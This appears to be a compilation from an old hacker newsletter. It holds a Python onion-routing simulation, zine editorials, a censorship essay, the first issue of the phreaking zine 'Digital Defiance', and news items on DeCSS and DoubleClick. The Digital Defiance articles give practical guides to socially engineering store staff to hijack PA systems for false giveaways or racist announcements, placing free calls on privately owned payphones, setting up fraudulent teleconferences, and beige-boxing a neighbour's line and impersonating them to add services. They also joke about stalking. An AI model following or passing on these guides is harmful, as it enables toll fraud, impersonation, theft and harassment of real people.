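    nonce = os.urandom(NONCE_LEN)
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def unseal(key: bytes, blob: bytes) -> bytes:
    """Peel one layer; raise if the tag fails (wrong router's key, or tampering)."""
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expect = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expect):
        raise ValueError("layer tag mismatch: not this router's layer")
    return bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct))))


def build_onion(route, keys, destination, payload):
    """Sender side: wrap innermost layer first (last OR's key), outermost last
    (first OR's key). Each layer holds only the NEXT hop, so an OR never sees
    the whole route."""
    hops = list(route) + [destination]
    onion = payload
    for i in range(len(route) - 1, -1, -1):
        onion = seal(keys[route[i]], hops[i + 1].encode() + SEP + onion)
    return onion


def peel(router, keys, onion):
    """Router side: strip own layer, read next hop, hand the rest onward."""
    inner = unseal(keys[router], onion)
    next_hop, _, rest = inner.partition(SEP)
    return next_hop.decode(), rest


def run_route(route, keys, destination, payload):
    """Simulate forwarding hop by hop. Returns (where the cleartext ended up,
    the cleartext, and a per-router trace of what that router and a tap on its
    links could observe)."""
    onion = build_onion(route, keys, destination, payload)
    trace = []
    holder, prev = route[0], "sender"
    while holder != destination:
        next_hop, out = peel(holder, keys, onion)
        trace.append({"router": holder, "from": prev, "to": next_hop,
                      "in_bytes": onion, "out_bytes": out})
        prev, holder, onion = holder, next_hop, out
    return holder, onion, trace


if __name__ == "__main__":
    # Constructed sample route and keys (router names and keys are placeholders).
    keys = {"or1": b"A" * 32, "or2": b"B" * 32, "or3": b"C" * 32}
    dest, clear, trace = run_route(["or1", "or2", "or3"], keys,
                                   "shop.example", b"GET / HTTP/1.0")
    for t in trace:
        print(f"{t['router']}: from {t['from']:>6} to {t['to']:<12} "
              f"{len(t['in_bytes'])} bytes in, {len(t['out_bytes'])} bytes out")
    print("delivered to", dest, "as", clear)
    # Each peeled layer drops NONCE_LEN + TAG_LEN + next-hop bytes, so the wire
    # size shrinks per hop: exactly the size correlation the paper's fixed-length
    # Mix messages are there to prevent.
```

The middle router's trace entry shows the point of the scheme: it knows it received from or1 and forwards to or3, but neither the destination name nor the payload appears in anything it handled.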
Freedom's system might be slightly different in implementation, but again, I'm ignoring details, and loving every minute of it!

When a specific message needs to be sent through the onion-routed network, several layers of encryption are placed on the message, along with sufficient information to describe the path on a step-by-step basis. This way, each onion router along the way uses its own public key to decrypt the whole 'onion', at which point it recognizes the next onion router in the route, and forwards the partially-decrypted message to it. When the enveloped message eventually reaches the final onion router, it is decrypted to cleartext, and the message is passed to the destination, not too differently from if the source host had simply connected in the clear over the Internet, except for the fact that it was made virtually untraceable for the duration of its trip from end to end.

Feel free to send me questions and commentary on anything I may have screwed up (or done well).
kynik@gh0st.net

***********************************************************************
*** The gh0st.net Project (Part 1 of 2): Phatal
***********************************************************************

Gh0stnet in its simplest and most basic form is a security model. As a security model, gh0stnet's integrity is maintained by the fact that it protects access, whether this be access to data or some other resource makes no difference. Complication occurs when we examine gh0stnet's purpose. The theme is not necessarily to provide an ultra-secure network... it's simply to provide security. Whether the provision of security is done well or even in a rational manner is up to us as developers.

Further complicating this matter is the concept of providing a security challenge or novelty to the public. Are we targeting a specific group of people to benefit from gh0stnet? As far as I'm concerned, no.
While we are all obviously aware that gh0stnet's existence specifically caters to a certain type of computer user, there's been no real intention to do so. By virtue of not being funded by a corporation or the government and also by the virtue of being conceptualized by someone who spends the better part of his day immersed in computer security, the compsec underground will inevitably be an integral part of gh0stnet. Hopefully this will be one of its greatest assets.

Although the physical establishment of gh0stnet is still in the works, I have a feeling that's going to be the easy part. I'm putting energy into gh0stnet with the intention that it will long surpass my interest. As a field of study and a science, computer security is an evolving subject. If gh0stnet is to ever provide anything substantial to its public, it will have to reflect this.

Development:

This is the area that gh0stnet should be the most active in. If there's one thing I hate it's purposeless work. What I hate more than purposeless work is being bored. From my perspective, I would prefer to do more than set up a number of boxes to let people hammer into the ground. It would be fun to look at the logs for a while, but ultimately it would become boring. I'm interested in using gh0stnet as a testbed for alternative, ingenuitive, and challenging security concepts. This would provide tons of fun for us, something interesting to give to the users besides boxen to break into, and more than likely create some very interesting offspring. Software or hardware, it's all a matter of what contributions we as individual developers have to offer.

Participation:

This is an area that I tend to give a lot of thought to. As "developers" we really do more than just develop. We maintain and administer gh0stnet. This is not a job. Participation is totally interest-based. I'm not one to force people into doing something that they don't want to.
If it appears that the role you're taking in this project is not quite what you want or what you expect, it's important that you speak up. I sacrifice a lot of my free time for this but I don't necessarily expect others to. The project does have a well-defined vision/goal that I may be relatively inflexible about, but not unapproachable.

What I will be very wary of is the inclusion of other individuals outside of my sphere of influence. This is a delicate project from my standpoint, so I'm a little touchy as to who deals with it. To have one person on board who doesn't quite see the goal or has some other motives besides the prosperity of gh0stnet would have a negative impact on the project. Stating this here serves no other purpose than for you folks to be aware that I want a shiny, happy, rosy environment in which I deal with people who I know and trust. Not that I don't like contributions, but network management and planning should pretty much be kept between us developers.

The most important part of getting this off the ground will be the communication that goes on between all of us. Hopefully most of the communication will be occurring on the gh0st.net box, courtesy of TF. Toxy has also been threatening to start a mailing list and that sounds kick ass to me. Natas, kp2, and I live in the same state and hopefully we'll all be getting drunk together soon ; ).

<Next issue = Basic network structure && games>

***********************************************************************
*** Violence, Censorship, & Our Rights : Blakboot
***********************************************************************

[Editor's note: I've taken the liberty to publish this article by Fire Storm's founding member in his absence. This article was (and still is) available at <http://fire.gh0st.net/vcr.html>. It has not been edited from its original form, except for formatting to fit the page, and minor spelling corrections.]
To most of the people who will read this, I have no credibility - why should you listen to me? Well, because if you read any farther, I'm sure you will find that I'm not writing about anything extreme; these are our rights.

Recently, in retaliation to school violence, people are working to suppress information pertaining to explosives; keep it out of the hands of youngsters. Although, this movement is not focusing on just that, rather make an exception to our rights, and quiet what we don't want people to hear.

You see, this country is based on tolerance. Some may be prejudiced, but we as a whole, in this country, don't just go off and destroy the minority. We tolerate it, because if one day our rights are threatened, we can count on other people to fight with us. It's about power of people, and not everyone can get what they want - so we must be tolerant, even if we don't totally agree with it.

The movement is contradicting itself. People want to educate the masses into an objective whole, yet want to shut out information, and take the philosophy, "Ignorance is bliss". We should work towards happiness, because anyone can learn to KILL; bombs, guns, knives, etc. are beside the point. People kill because of many reasons, and "now they can" isn't it.

The general public is quick to say that bombs, guns, and "outcasts" are the reason for this school violence problem. Wrong. Students don't kill just because they _can_, it's because, perhaps they're miserable? Perhaps they're implementing the violence many students just think about? My opinion is yes; I'm even tempted to say the majority by far think about violence as an outlet. "Wackos" just don't think about violence; everyone does and sometimes we actually do what we plan. I'm not trying to justify what these people do, but I'm saying these aren't just some isolated cases. Something is wrong. I personally think it's new pressures in society today and the school environment.
Keep in mind that the basic idea/concept of how school works has never changed. This "concept" isn't education, it's the environment, which is stressful and obviously causes violence. You may say something to the effect, "Stress is a natural part of life". I agree with you, but these are CHILDREN we're talking about, and they obviously can't cope.

Back on the subject of unalienable rights. If we make an exception, we'll find ourselves taking away our own rights, _one_by_one_. There is NO exception, these are our RIGHTS! There will always be someone you disagree with, but you'd better respect THEIR freedom, if you want them to respect YOUR freedom. Because one day, your thoughts may not fit in with the majority.

End points: People in the United States of America have the right of press; we can write about anything and everything. If you don't like it, leave. See how other governments deal with these things, and tell me how much you hate liberalism. Leave and go to a country where you can't say jack, and tell me how much you'd like to shut up those boisterous protestants. This issue isn't something new. Censorship itself is an exception we've made, and it's wrong.
*********************************************************************** *** Future Issues *********************************************************************** The gh0st.net Project (Part 2 of 2) : Phatal Creating Restricted ("Sandboxed") User Accounts : Fict *********************************************************************** *** Credits *********************************************************************** Editor: Kynik <kynik@gh0st.net> Co-editor: Ajax <ajax@gh0st.net> Article Contributions: Phatal <phatal@gh0st.net> Blakboot <blakboot@discussion.org> *********************************************************************** *** Subscription *********************************************************************** To subscribe to this 'zine: email kynik@gh0st.net or napalmzine@hotmail.com with a subject of SUBSCRIBE To unsubscribe: email kynik@gh0st.net or napalmzine@hotmail.com with a subject of UNSUBSCRIBE Submissions, questions, comments, and constructive chaos may also be directed to kynik@gh0st.net, napalmzine@hotmail.com or any of the contributors *********************************************************************** -=- And here's Digital Defiance Issue #1: :::::. ... ::::::. ::::: ::::: '::::: ::':::::. ''' ::: :::: :: ':::::. ::. ... ::::::: :::: :: .:::::: ::: ''' '':::'' :::: ::.:::::::'.::' .:::::. . ::: ::: .:::::. :::: ::::::::'.::: .::' ':::: ::: ::: ':::'':::. ::::. .: :::::::'.:::::. ':::...:::: .::: .:::. '::::::'::. .::::::::::: '::::'::' .::' .:::' .... .... .... ... .... . . .... .... .::' .::::' : : :.. :.. : :..: :' : : :.. '::.:::::' : : : : : : : : ': : : '''''' '''' '''' ' ''' ' ' ' ' '''' '''' Art By Pyro Disclaimer: All the below mentioned information is published for educational purpurposes only I myself nor any staff member of Digital Defiance promote criminal activities, please don't use this info to tarnish the reputation of "hackers" or "phreakers" worldwide. Table of Contents: 1. Introduction -Xenos 2. 
Feature of the Month: DialPad.com -Pyro
3. Intercom Fun -Xenos
4. COCOTs and other privately owned payphones -Pyro
5. Various Call Tracing Devices and Services -Toxis
6. Closing and Various Thoughts and Comments -Digital Defiance Staff

Protection is an Illusion - Xenos

1. Introduction

Here it is, the first issue of Digital Defiance. Let me provide some background info. On June 13th of 1999, after the PLA 919 site had been taken down due to the fact that Code Zero, its former founder, had moved, I decided to put PLA 919 back on the net. July 1st of 1999 Pyro joined up with PLA 919; it was the start of a good friendship. germ, a friend of mine, had joined but was not predominantly in the scene and so she left; Spy109 started PLA 252 and so he left. On July 5th of 1999 I put out the first issue of PLA 919 along with an article or two from Pyro and two from germ. After months of deliberation I decided I would freeze PLA 919 as a "zine" and keep it up as a page for NC phreaks to meet. I didn't like the negative connotations that arose with the acronym PLA and I felt that after some time I would also do better with an independent organization. Pyro and I decided on Digital Defiance. As of now the staff members of Digital Defiance are myself (Xenos), Pyro and a boy by the name of Toxis. Digital Defiance is situated at digital-defiance.hypermart.net, but if you have this article you probably know that. After the available funds are acquired I will be registering www.digital-defiance.org. For now hypermart is great. I hope that the readers of Digital Defiance are satisfied and will continue to be.

Now the cheesy part, SHOUTS: Pyro, Toxis, Geo, Tory, Kimmie, Ivy, Twinjames, Oktium, oreo, Claudia (better luck next time), Gibson, Nikita, nite, Courtney, Yerba, heX, Subconcious, Myth, peak, Beaty, and lots of other people that are going to beat me up after they see they aren't on here. Now on with the show.

2.
Feature of the Month: DialPad

Well, I first came upon this one when I was looking for a way to get my computer to record my prank calls directly, instead of to a tape recorder and then to my computer. One of my friends suggested a service called DialPad so I checked it out. I was never able to get DialPad to work that way because the computer only records my side of the conversation well, while the other side is left sounding faint and distant, but the service is still kick-ass.

So, what is DialPad? DialPad is a free online service that allows you to make uncharged calls to about anywhere. It does not allow 900 numbers from what I can tell, so you phone sex freaks will have to take it elsewhere. Basically what happens when you log into your account is this nifty Java applet pops up which allows you to make phone calls. You punch in the numbers and then press dial and there you have it. You can even call someone else who is on the service if they are using DialPad at the same time, but it sounds real messed up. Another problem I have encountered is that your voice seems kinda lowered and distorted to the people you call with DialPad, but they can still make out what you are saying. In many ways that is almost a plus as it makes for hilarious pranking.

My personal favorite is calling 1-800-COLLECT and getting operator assistance. It's real fun just trying to get into conversations with the operators. Now, you would probably hold back from pranking because you don't feel like getting in trouble, right? Well, actually, the ANI always seems to return an "Unknown Number" and I have tested this on many different ANIs and VMBs, and even the freaking operators seem to be stumped. For example, a couple of times I have called up an operator and in the background I heard a lot of funny stuff. Some of them were saying "God damn it, who is this guy!?" and "Man, where are those little fuckers calling from?!".
I laughed my ass off while they bitched to their coworkers and then hung up on me. One time, I called an operator and I mentioned that I had been pranking them a lot that night (just to piss her off) and she said "Well, yes. We have been getting a lot of reports of that kinda thing." So, I asked what the number I was calling from was, and I could practically hear her head almost explode as she said that it "was none of my business!" This made me laugh because it was my business. I mean, I was calling from that number. It goes to show you that they really cannot trace you. So, stop by DialPad.com and have fun. One thing I suggest is that you give 'em fake info so if they do get that far, they won't get any further. Have fun and be careful!

3. Intercom Fun

So hmmm, it's rainy today and you are really bored? I have the remedy. You're not paying the money for long distance calls to friends, you're tired of TV, being a conf. whore just isn't settling with your stomach, so you give stuff away free at K-Mart. Wait, you say, I don't want to go to K-Mart, and those of you underage are saying you can't drive, so why not take the PA?

The Planning: There isn't much planning in my case 'cause I come up with fake names like that and fake titles and positions in companies like that, so just go grab your phone book (if you don't have one and say you're a phreak, go get one now before I beat you up) and look for the addresses of two different K-Marts (you can substitute Target, Wal-Mart, etc.). Dial the target K-Mart and repeat something similar to the following: "Hi, this is Jake Watson over at the Hamilton store, are you guys having some problems with your PA system (some people say intercom)?" Be sure to have gotten the manager first; most of the time the other employees are just plain dumb.
He will tell you no, of course, at which point you will say "Well, we have been and I don't know what is going on. Usually we use #50 and I remember the old manager said you guys had the same type of system as us. I was just wondering." Let him get some words in, it makes him feel special; he will probably just tell you that it's working fine for him and he doesn't know what's wrong. You might even want to make up a symptom first, like it's giving you static when you press #50 or something like that. Then say "Well, what is the extension you guys over there use?" He will tell you; after all, you are over at the Hamilton street store, why would he suspect you are just some no good punk trying to give away his store? Say well, thanks anyway, and say you will try that and have a good day and all that.

The Strike: Later on, call the store back. You will probably get the help desk or something; I recommend getting transferred to gardening or toys or something 'cause the help desk will probably say no when you ask to be transferred to extension #8090 and they recognize it's the PA extension. Some places like Target, I have heard, will just transfer you back to the help desk if you ask to be transferred. Sometimes you get places that are like "just hit #something when I put you on hold". Then hit the intercom extension. You can say all sorts of stuff. At a Beyond HOPE convention they told everyone in the store that everything on Aisle 4 was free; maybe say you are the manager and spout racist statements. In the end no one really gets hurt and you are happy. I once thought of getting a friend to be in electronics and then say everything there was free. I knew that if everyone grabbed stuff the alarms would go off like mad and your friend could slip by unnoticed. I don't recommend thievery though.

Ok, so I have told you what to do with K-Mart. What about school fun? This was actually an idea I had early on when I first went to school, and it was actually done as a senior prank by some other guys.
Most schools, if not all schools, have an intercom system to page teachers and students when they need them, to suspend them or bitch at them for showing bad movies or something of that nature, for either students or teachers. Fortunately for the average student, most school employees are really stupid when it comes to the technological aspect of their work. For instance, my school allows use of all extensions from any phone hooked up to the school's phone line. So say you were a senior and you drilled a hole in the side of the trailer and ran it out to the parking lot and played some vulgar tape after pressing #00; you would have it played throughout the school just because you have an extension. You might try a manual hand scan of the phone numbers that your school owns, just a tip on that. Get any number of your school and the first five digits are the ones it owns, like 856-79XX or something like that. Sometimes you might find that your school runs a PBX and that you can abuse them further. Getting the extension numbers isn't hard; they are probably posted behind the desk in the office just because the secretaries are too dumb to remember them. So just try to find a number for the school that will give you an outside line, or beige off the side or something like that. A lot of different places use paging systems that are often tied into the PBX system or have the phone systems integrated into them. Try using the line "Can I get an outside line?" a lot and mention you are from so and so department or you are testing such and such.

Sorry for the brief cut off of information. I had started this in the mood to write a really large article, but I had stopped half-way through and had to come back to the zine and keep writing, so it's not as good as I planned it to be.

4. COCOTs and other privately owned payphones

=== Introduction ===

Many of you have probably heard of COCOTs at one time or another. Maybe somebody mentioned it briefly but you didn't know what one was.
Well, simply put, COCOTs are privately owned payphones not controlled by Ma Bell. COCOT stands for Customer Owned Coin Operated Telephone. Sounds neat, eh? But where are these "COCOTs?" They are everywhere! They are at convenience stores, malls, schools, clubs, and tons of other places like that. A convenience store down the street from me happens to have three, but how do I know that these phones are COCOTs? Well, some of a COCOT's distinguishing features include:

-The COCOTs never have their phone number listed on them (they don't like you to have it)
-They will not have the AT&T logo or whatever on them. This is mainly because they use expensive rip-off carriers so they can cash in.
-They have some nifty stuff inside 'em (not visible but very detectable, as I will explain later)
-They are run on standard telephone loop lines instead of the "special" payphone loops

There are some other unique things about them but those seem to stand out in my mind the most. Plus, those are the best ways to identify them. Not having the local phone company logo on them is probably enough to pick one out by itself already, but I have been tricked by this one GTE phone at my high school. The GTE logo was hidden, but I did see that its phone number was listed, so you can see that they are pretty easy to pick out of a lineup by checking for the features I listed above. In this article, I will try to keep the information as factual as possible, but I may get into theory a little bit with the things I'm not sure of.

=== The different types of COCOTs ===

I've done some major research on COCOTs and I have gotten the most common ones you'll find and I will describe them here.

-The Elcotel series 5

Elcotel phones are pretty simple. They run on line power and will not do anything if disconnected. They are pretty common and you could probably pick one out right after you had dialed a number, because faintly in the background you can hear the number being redialed (and pretty slowly too).
These phones take the money after your call is over and they will ask for more if it is required, in a fairly human-like voice. It is pretty fun to call them and mess around, because when you call and their modem shuts up you can dial a number and it thinks that it is placing that call. If you call it and do nothing, it will read out its number and how much money it has acquired. I have heard of another type of Elcotel phone being used but I have never seen one.

-The Ernest Telecom D1

Once again, this phone is not the only one made by the company, but it is the most common. This COCOT is unique in that it uses a fake dial tone which is hard to distinguish from a real one, but it's there. These guys work on a supplied power line and won't work if the power is out. These particular phones have a nasty sounding robotic voice that gets kind of distorted sometimes, and when you call them a modem answers. Another model I have seen of theirs is the D3, which uses a real dial tone, but I won't get into too much depth with this one...

-The Protel models

There are a couple of different Protel phones in use today. Those are the Protel 2000, 4000, 7000, and 8000 models. From what I hear the 8000 and 4000 are fairly similar. I have personally never run into these, but I hear that they are more widely used along the western half of the US. I don't know too much about them so I will just mention their existence.

-The Intellicall phones

The first of two models commonly used is the Ultratel. These things are pretty old but you can still find 'em in rural areas. They aren't too much to look at and they have an annoying computerized voice. These phones are pretty fickle about dialing procedures and they will get on your nerves pretty quickly. When you place a call and the receiving party answers, the phone will play the 1 tone a couple of times to prevent fraud, but I have not heard of anyone doing anything to mess with those anyway. The other model made by Intellicall is the Astrotel.
It is newer and has a less annoying voice that sounds more like an actual human. Now these phones happen to have a 14,400 baud modem, which is not bad for an ugly payphone. These phones also do the 1 tone thing when the phone is answered, so if you plan on scamming these you're out of luck.

Well, there are probably a bunch more COCOT type phones out there, but I mainly know of these. If you know of any others of significance, send some info on them in and I may alter this article to include that phone.

=== So what's so cool about these phones? ===

As you have read, there are varied types of COCOTs and each is slightly different. And with each phone there are certain flaws. On some phones (I have not got the documentation of which) you can get real easy free calls, providing that the phone does not mute the microphone in the handset after you are hung up on. Getting any ideas? Well, on those nifty little phones you can call up some random 800 number and when the number answers you, just keep quiet. They will get tired of listening to nothing and will then hang up on you. Now, instead of setting the phone back down, you would wait and then hear a second dial tone. Now, you would be able to punch in your real number and call up your friend. Well, not exactly. When the person on the other line hangs up on you, the phone deactivates the keypad so you have to hang up to use it again. I have actually heard that in some instances the buttons will be locked in place. I thought that was weird, but it is still something you can bypass, and in the same way too. You would whip out your trusty Radio Hack tone dialer and dial away. Yep, free calls. I have done it a few times, but at the time I could not pick out different types of COCOT models, so I don't remember which models allow that kind of thing. It can be done; all I need to do is keep searching.

Now, I have only heard other people's stories, but they suggest to me that they are easy to red box.
Since it is a regular line and the phone deals with everything by itself, the phone company cannot catch you. I have not boxed a COCOT myself or even seen it done first hand, but I will probably try to box a COCOT someday.

Another nifty thing you can do with many COCOTs involves the modems that they have inside. When a customer purchases a COCOT, they receive a couple of things along with it. They will get a manual of course, but in addition to that they will get a cool software package. With this, the owner can dial into the COCOT and communicate with the modem. That way, they can remotely find out how much money it has and maybe some other stuff, depending on the model. If someone could get their hands on that software, they would have some fun with it, I'm sure.

=== Alliance Teleconferencing ===

Another cool thing to do with COCOTs is to set up an Alliance teleconference. It is simpler than the name suggests, with its 5 dollar words and all. To set one up on a COCOT, you would probably want some ulterior, nontraceable way of getting in touch with you (yep, this requires social engineering). One method that comes to mind is setting up a Ureach account. All you do is go to www.Ureach.com and you can get a 100% free VMB. Now getting back to setting up that conference. So after you pick a target phone, you call the AT&T teleconference setup number at 1-800-232-1234 (there are others, but this one is the single best I know of). They will ask you for info and you just give them what you want them to know.
After they ask all that stuff they might want to know, and they ask for the number they can reach you at, tell them that you are calling from your business phone (yes, it is suggested that you say it is for a business conference) but you will be out for the next few days (or around how long it may take to set up the conference) and that they may reach you at your VMB (yep, the one you set up; also try to make the VMB greeting sound legit as it will add to credibility). Now you wait and they will call your VMB in a while with all the info you need. Once this is done you have a conference waiting to happen. Note: It is not suggested that you use the admin code to access the conference, so that they cannot prove that you were the one to have set it up in the first place. So when you get in there and they ask you how you got into the "fraudulent" conference, you simply say that some guy online said to.

=== Closing ===

Well, I hope this was informative for you. I actually learned some stuff too while I was gathering info. I would like to thank Toxis for inadvertently giving me the idea to write this article, and I would also like to thank El Jefe for having an informative payphone website at which I gathered info on specific COCOT models, and Xenos for the info on dialing into the COCOT modems.

5. Various Call Tracing Devices and Services

Caller ID - CNA - ANI - ANAC

How does the telco trace all those prank calls you've been making to that op who really turns you on? Well, if you're smart, they won't be able to use CallerID to get your number, but it is a possibility, so let's examine that first. The technical workings of CallerID are very easily found. A good text on it is available at http://www.flinthills.com/~hevnsnt/newbie/callerid.txt and everything you'd never need to know is there. It really would not make sense to write it all here, but here are the basics.
When you make a call, it has a header (not unlike an ICMP header) which tells the CallerID box, which every yuppie owns, that you are calling from 1800-P00P-SEX and your name is Tom. This way, they can call you back, or bitch you out. But what if you're blocking CallerID info? How does that sexy op at Bell know your phone number? Well, either you gave it to her, or they used a service called ANI. ANI stands for Automatic Number Identifier. You can use ANI too. What ANI does is it reads back your number. That simple. Don't worry about HOW it works, but know it does. ANI numbers are useful for you naughty beige boxers because it tells you the number you are calling from. This way, you can set up a conf for everyone in #2600.

A close relative of ANI is ANAC. ANAC is really just ANI but local to an area code, and sometimes open to the public. ANAC stands for Automatic Number Announcement Circuit. In most areas, ANAC numbers are like Directory Assistance and have a 3 digit code. In some places, it is 711 or 200. Dialing it will read back your number. Same uses as above.

And one thing useful for messing with people along with these is CNA. CNA is Customer's Name and Address. Any guesses as to what it does? It tells you the name and address of a specified phone number. I have successfully used 411 to do this, without a true CNA service, or something like infospace.com, which I recommend highly. If you're (God forbid) stalking someone, and you are calling them constantly, and want to know where they live, you could get their CNA and then go to their house and show them your willy. Note: CNAs are almost never open to the public, so you can try to get the bitch at 411 to do it for you, or you could use one, albeit illegally.

Something many people overlook is the ability to mess with someone through a combination of these, or get free 3-way calling. What you do is, first, go to phreakers university in Canonsburg PA; remember, the Phone Fraud Fox says we are 'taught'.
Take Social Engineering 1, 2, and 3. Now go to your neighbor's telco box, and hook up your beige box. Now call an ANI or ANAC and now you've got their number. Next, get the CNA for that number. Now, call up the telco (it's GTE here, soon to be Bell Atlantic ;-)), and get them to add three way calling, or ask them if it's been installed yet, saying the service was giving you trouble. Act like the person whose name you got in the CNA record, and you're set. Now just run some line (you can get this by going with a friend, distracting the lineman, and having one of you grab a spool and toss it into a bookbag) to your house, and hook it into the rack of modular jacks, patch cable, and switches, and the light which tells if the line is in use. Now, whenever you want to three way call, clip after where you connected your line (you could install a device which opens/closes the circuit) so they can't pick up, and three way call your 31337 friends.

6. Closing and Various Thoughts and Comments

I wanted to apologize for the fact that Toxis' article isn't like the rest of the zine; it's just the difference between him using his text editor and me and Pyro ours, and I don't feel much like fixing it, being as I have a lot of stuff to do aside from this.
- Xenos

I am sorry for the slow updating, I suppose, of the Digital Defiance site; like I said, I have lots to do aside from this. I have had some conflicts with other online related events that turned out to be fine, but for a night I didn't get online. I think that once the vacations come etc... I will have time to pay more attention to the zine and the site, and I will have my laptop then so I can work on the articles everywhere.
- Xenos

We do accept article submissions for review and possible publishing in later issues of Digital Defiance. This first issue only has a couple of articles because we wanted to start small and build up.
Feel free to send questions, comments, and mail you want in the issues to DigitalDefiance@juno.com
- Xenos

Hey, this is Pyro. I would like to thank the other members of Tele-Hell and Digital Defiance for their continuing support in my efforts. I hope you all really like our first issue. This has got to be one of the best things I have ever taken part in and I'm glad I had the opportunity to meet Xenos and be able to construct our very own zine; he truly is 13370. Well, that's about it for now. Oh, and if you want personalized graphics (smell a shameless plug?) drop me a line. Thanks again...
-Pyro

(C) Copyright, Xenos 1999
Unless special permission is obtained from Xenos, none of the preceding information can be used without the name of the original writer on it.

@HWA

86.0 HNN: Feb 2nd: WorldWide Protest Against MPAA Planned
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Macki
Members of the hacker and open source communities worldwide, along with various civil liberties groups, are planning a massive leafletting campaign on Friday, February 4 to call attention to the recent attempts by the Motion Picture Association of America to shut down thousands of web sites.

Press Release
http://www.hackernews.com/press/2600DVD.html
Open DVD
http://www.opendvd.org
2600
http://www.2600.com

February 2, 2000
FOR IMMEDIATE RELEASE

DAY OF ACTION PLANNED AGAINST MOTION PICTURE ASSOCIATION IN 100 CITIES

Members of the hacker and open source communities worldwide, along with various civil liberties groups, are planning a massive leafletting campaign on Friday, February 4 to call attention to the recent attempts by the Motion Picture Association of America to shut down thousands of websites. Lawsuits have been filed against hundreds of people, as well as an Internet Service Provider and a magazine, for having information the MPAA wants to keep secret.
The controversy centers around a computer program known as DeCSS, thought to be written by a 16 year old in Norway. The program defeats the encryption scheme used by DVDs which prohibits them from being viewed on non-approved machines or computers. It also enables DVDs from one country to be played in another, contrary to the wishes of the movie industry. It does NOT facilitate DVD piracy; in fact, copying DVDs has been possible since their introduction years ago. In its press releases on the subject, the MPAA has claimed that this is a piracy issue and they have subsequently succeeded in getting injunctions against a number of sites that had posted the program in the interests of free speech.

This is in effect a lawsuit against the entire Internet community by extremely powerful corporate interests. The lawsuit and the various actions being planned promise to be a real showdown between two increasingly disparate sides in the technological age. The consequences of losing this case are so serious that civil libertarians, professors, lawyers, and a wide variety of others have already stepped forward to help out.

Friday's action will be coordinated in 74 cities throughout North America and 26 cities in other parts of the world. Leafletting will take place outside theaters and video stores in these cities, all of which participate in a monthly "2600" gathering. 2600 Magazine has been named in two lawsuits regarding the DeCSS program and has joined with the growing number of people who will fight these actions by the MPAA until the end.

The lawsuit has been filed by the Motion Picture Association of America, Columbia/Tristar, Universal City Studios, Paramount Pictures, Disney Enterprises, Twentieth Century Fox, Metro-Goldwyn-Mayer Studios, and Time Warner Entertainment.

Contact: Emmanuel Goldstein (631) 751-2600 ext.
0

@HWA

87.0 HNN: Feb 2nd: DoubleClick Receiving Protests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
Recent plans by online advertiser DoubleClick to match web surfers with offline profiles for more targeted ad campaigns have caused concern among consumer advocacy groups. The Center for Democracy and Technology (CDT) is calling for the public to send email to DoubleClick's CEO and 60 of the company's clients.

The Center for Democracy and Technology
http://www.cdt.org/
C|Net
http://news.cnet.com/news/0-1005-200-1539478.html?tag=st.ne.1002.bgif.1005-200-1539478

DoubleClick under email attack for consumer profiling plans
By Evan Hansen
Staff Writer, CNET News.com
February 2, 2000, 5:35 p.m. PT

update A consumer advocacy group has organized a protest against DoubleClick, encouraging the public to email complaints about the online marketing giant's privacy policies to the company and 60 of its clients.

The Center for Democracy and Technology (CDT) unveiled the campaign yesterday, calling for a stop to what it describes as DoubleClick's efforts to use its relationships with prominent Internet companies to track the online activities of millions of individuals and tie them to those individuals' offline activities.

DoubleClick denied that it collects information on personally identifiable individuals in an email response to the campaign sent to its clients yesterday.

"DoubleClick does not use highly sensitive information for profiling such as health information, detailed financial information, information of a sexual nature and information on children," the email reads. "DoubleClick will not link personally identifiable information about a user to online behavior without first giving that user notice and the choice not to participate.

"DoubleClick does not and cannot know the identity of a user online unless that user has provided that information to an Abacus Online participant who has provided the user with the appropriate notice and choice."

Gregg Bishop, the vice president for technology operations at DoubleClick client TheStreet.com, said his company began receiving emails from the protest list at about noon yesterday. He said he had received 2,200 emails from the campaign by early this morning.

"The first thing we did was turn around and contact DoubleClick," he said. "We were told that what the CDT is doing is legal."

Bishop said TheStreet.com does not share information about its customers with DoubleClick. He said the company will post a policy regarding its relationship with DoubleClick on its Web site and refer people who complain through the CDT's email distribution list to that statement.

"I've only noticed one complaint that has come from our more than 100,000 actual customers," he said.

The protest comes after DoubleClick last week quietly published a new privacy policy that discloses plans to create a database of consumer profiles that would include each user's name and address; retail, catalog and online purchase history; and demographic data. The database, which DoubleClick says will only be seen by the company itself, is intended to help the targeted marketing efforts of its nascent U.S.-based Abacus Alliance, an outgrowth of its recent acquisition of direct marketer Abacus Direct.

Until recently, DoubleClick's policy was to refrain from correlating personal information with its 100 million cookies, which are scattered worldwide. But the new database will rely on the cookies, which the company places on Net users' computers to record surfing habits and display pertinent advertising. Net users aren't informed when they are given a DoubleClick cookie unless their browser is preset to do so, but they can "opt out" through the company's Web site.
The CDT Web site gives consumers instructions on how to remove the cookies from their computers and opt out of the system. It also includes a form letter that visitors can elect to send to the public email addresses of DoubleClick's CEO and 60 of the company's clients.

CDT spokesman Ari Schwartz said the DoubleClick clients targeted in the campaign were culled from DoubleClick's Web site and SEC filings. The email is being distributed through a mailing list dubbed "doubleclickwatch." Targeted companies have the choice of opting out of the list by replying to the email, although companies that opt out may continue to receive individually addressed emails.

"To whom it may concern," the message begins. "I understand that you are a member of the DoubleClick network. This means that you allow DoubleClick to collect information about what I do at your Web site. I believe that this practice is objectionable and should not occur without my explicit permission."

Among the companies included on the email distribution list are AltaVista, Ask Jeeves, AuctionWatch, Blue Mountain Arts, Drkoop.com, Hewlett-Packard, Kozmo.com, Network Solutions and The New York Times Co.

Schwartz said that at least 500 emails went out from the site in the first five hours of the protest, which began at 10 a.m. PST. In that time, two recipients asked to be removed from the list, he said, although Schwartz declined to identify them.

